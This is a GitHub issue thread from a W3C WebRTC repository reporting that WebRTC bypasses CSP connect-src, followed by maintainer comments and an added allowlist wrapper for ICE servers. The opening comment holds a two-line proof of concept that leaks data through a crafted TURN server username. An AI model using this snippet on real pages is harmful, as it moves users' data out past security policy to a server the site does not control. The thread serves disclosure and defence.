w3c / webrtc-nv-use-cases

Use cases for WebRTC NV
https://w3c.github.io/webrtc-nv-use-cases/

WebRTC bypass CSP connect-src policies #35

Closed murillo128 closed 5 years ago

murillo128 commented 6 years ago

As explained here: https://github.com/w3c/webappsec-csp/issues/92, WebRTC bypasses the CSP security policies for connect-src, and a malicious script could use WebRTC to leak data to a rogue server.

Note that it is not even necessary to use datachannels at all, as you could leak data (at a low rate) to a specially crafted TURN server in the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

IMHO this should be covered in the CSP spec, but we should add a warning in the security and privacy section of the WebRTC spec until this is solved.
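
Added example, not part of the issue thread or of any spec text: one way a page could restrict the ICE servers its own code passes to RTCPeerConnection to an allowlist of hosts, in the spirit of connect-src. The function names and the host turn.example.org are assumptions, and a script-level wrapper like this constrains and audits first-party code but is not a browser-enforced policy.

```javascript
// Added example: allowlist check for ICE servers (all names here are hypothetical).

// Parse scheme:host[:port][?transport=udp|tcp]; returns null for anything else.
function parseIceUrl(url) {
  const re = /^(stuns?|turns?):(\[[0-9a-f:.]+\]|[^:?\[\]\/@\s]+)(?::(\d{1,5}))?(?:\?transport=(udp|tcp))?$/i;
  const m = re.exec(String(url));
  if (!m) return null;
  return { scheme: m[1].toLowerCase(), host: m[2].toLowerCase(),
           port: m[3] ? Number(m[3]) : null, transport: m[4] ? m[4].toLowerCase() : null };
}

// Keep only iceServers entries whose every URL targets an allowed host.
// The report lists rejected URLs only; usernames and credentials are not copied.
function checkIceServers(config, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const kept = [];
  const rejected = [];
  for (const server of (config && config.iceServers) || []) {
    const urls = [].concat(server.urls || server.url || []).map(String);
    const ok = urls.length > 0 && urls.every((u) => {
      const p = parseIceUrl(u);
      return p !== null && allowed.has(p.host);
    });
    if (ok) kept.push(server);
    else rejected.push(...urls);
  }
  return { config: { ...config, iceServers: kept }, rejected };
}

// Wrap scope.RTCPeerConnection so every new connection passes through the check.
// Returns the original constructor; onReject receives the rejected URL strings.
function guardPeerConnection(scope, allowedHosts, onReject) {
  const Native = scope.RTCPeerConnection;
  scope.RTCPeerConnection = class extends Native {
    constructor(config, ...rest) {
      const result = checkIceServers(config, allowedHosts);
      if (result.rejected.length > 0) onReject(result.rejected);
      super(result.config, ...rest);
    }
  };
  return Native;
}

// Constructed sample: one allowed host, one server outside the allowlist.
const sample = { iceServers: [{ urls: "stun:turn.example.org:3478" },
  { urls: ["turn:192.0.2.7:3478?transport=udp"], username: "u", credential: "c" }] };
console.log(checkIceServers(sample, ["turn.example.org"]).rejected);
```
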

alvestrand commented 6 years ago

Pull request on CSP spec: https://github.com/w3c/webappsec-csp/pull/287

henbos commented 6 years ago

What's the status here?

alvestrand commented 5 years ago

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

aboba commented 5 years ago

With merger of PR 38, closing this issue.